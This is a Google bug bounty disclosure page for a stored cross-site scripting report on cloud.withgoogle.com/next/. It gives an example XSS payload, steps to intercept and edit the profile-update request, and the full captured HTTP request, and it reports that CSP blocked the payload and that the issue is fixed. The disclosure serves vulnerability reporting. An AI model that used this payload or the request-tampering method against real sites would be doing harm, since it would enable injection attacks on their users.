Skip to Content (Press Enter)
Google
Bug Hunters
XSS in https://cloud.withgoogle.com/next/
Reported by:
Alva Radian
Google VRP
triaged
18:26 | Aug 16, 2021
accepted
22:29 | Aug 17, 2021
fixed
18:50 | Aug 18, 2023
reward decided
$100
Example Payload :
"><input onfocus=alert(1)>
Steps to reproduce:
Go to
https://cloud.withgoogle.com/next/
and click on Register now button
Create an account with your email and fill the First Name and Last Name with XSS payload
Then click on Save button (make sure for capture the request before click on Save button), in http request, you will saw request like this :
POST /identitytoolkit/v3/relyingparty/setAccountInfo?key=AIzaSyCpYSl87CyGlI8d9-FQ_srX9PYjTfYGiwg HTTP/1.1
Host: www.googleapis.com
Connection: close
Content-Length: 1063
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
X-Client-Version: Chrome/JsCore/8.3.1/FirebaseUI-web
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
X-Firebase-Locale: en
Content-Type: application/json
Accept: */*
Origin: https://cloud.withgoogle.com
X-Client-Data: CJa2yQEIpLbJAQjBtskBCKmdygEIjJ7LAQiioMsBCNzyywEI7/LLAQjO9ssBCLT4ywEInvnLAQj4+csBCL39ywE=
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://cloud.withgoogle.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"idToken":"eOKEN,"displayName":"&lt;input onfocus=alert('test')&gt;,"returnSecureToken":true}
See the payload was encoded, replace the encoded payload to new payload(not encoded payload)
Forward the request and verify the account
Now login to account and click on profile then inspect element you will see the XSS payload get blocked by CSP(see on images xss-cloud.withgoogle.com.png)
Browser/OS:
Chrome/Windows 10
登录
使用 Google 账号登录